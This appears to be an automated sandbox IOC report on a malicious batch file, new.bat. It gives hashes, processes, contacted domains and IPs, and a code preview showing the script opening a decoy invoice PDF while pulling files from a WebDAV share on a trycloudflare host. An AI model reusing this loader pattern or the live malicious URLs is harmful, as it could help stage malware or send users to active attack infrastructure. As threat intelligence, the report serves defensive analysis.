IOC Report
new.bat

Files

File Path

Type

Category

Malicious

new.bat

DOS batch file, ASCII text, with CRLF line terminators

initial sample

Details

Filetype:	DOS batch file, ASCII text, with CRLF line terminators
Entropy:	4.99014418879273
Filename:	new.bat
Filesize:	1478
MD5:	bb09c4b01e76e689822717e2ffdb115d
SHA1:	7c9503233088afa72fde84b872cd11b672ac6131
SHA256:	0ffa30d24d62b4015f54ebe21732d240b252cc391c1d196d913bfff981648455
SHA512:	ce669957a6e64af34b7371a117ffda12d116bbbdd383046c212e76dd7b0ecc78a8967f931db4ee271193dfd72938d97ee7eec13385d41fc73fa6c93350aafaa6
SSDEEP:	24:wKy2N0zOFSMVgAqewoxwbXn6omx4nXX6kkx4XHG4x7XmvnuVM/rRbXpQjQZhQeli:c2Nq7rzox2XZmx4nn3kx43Px72vuMrXU
Preview:	@echo off..setlocal....set source=\\loaded-swift-degrees-packages.trycloudflare.com@SSL\DavWWWRoot\google\Win..set destination=%USERPROFILE%\Downloads....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"........echo Copying update f

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

Chrome Cache Entry: 46

HTML document, ASCII text

downloaded

Details

File:	Chrome Cache Entry: 46
Category:	downloaded
Dump:	chromecache_46.12.dr
ID:	dr_2
Target ID:	12
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	HTML document, ASCII text
Entropy:	5.0572271090563765
Encrypted:	false
Ssdeep:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
Size:	315
Whitelisted:	false
Reputation:	high

Chrome Cache Entry: 47

HTML document, ASCII text

downloaded

Details

File:	Chrome Cache Entry: 47
Category:	downloaded
Dump:	chromecache_47.12.dr
ID:	dr_3
Target ID:	12
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
Type:	HTML document, ASCII text
Entropy:	5.0572271090563765
Encrypted:	false
Ssdeep:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
Size:	315
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\user\Downloads\kam.cmd""

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\user\Downloads\las.cmd""

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\user\Downloads\zap.cmd""

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\user\Downloads\xff.cmd""

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2504 --field-trial-handle=2480,i,11551897311519012377,11188016322124477150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8

There are 2 hidden processes, click here to show them.

URLs

Name

IP

Malicious

https://s2r.tn/cgi/INVOICERVSHA.pdf

Details

Name:	https://s2r.tn/cgi/INVOICERVSHA.pdf
TargetID:	0
From Memory:	false
Current Path:	C:\Windows\System32\cmd.exe
Source:	browser

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
HTML page is missing a favicon	Phishing
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

https://s2r.tn/favicon.ico

70.38.21.234

Domains

Name

IP

Malicious

s2r.tn

70.38.21.234

Details

Name:	s2r.tn
IP:	70.38.21.234
TargetID:	12
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

www.google.com

142.250.185.68

Details

Name:	www.google.com
IP:	142.250.185.68
TargetID:	12
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

18.31.95.13.in-addr.arpa

unknown

50.23.12.20.in-addr.arpa

unknown

IPs

IP

Domain

Country

Malicious

142.250.185.68

www.google.com

United States

70.38.21.234

s2r.tn

Canada

192.168.2.8

unknown

unknown

192.168.2.7

unknown

unknown

192.168.2.16

unknown

unknown

192.168.2.9

unknown

unknown

192.168.2.4

unknown

unknown

239.255.255.250

unknown

Reserved

DOM / HTML

URL

Malicious

https://s2r.tn/cgi/INVOICERVSHA.pdf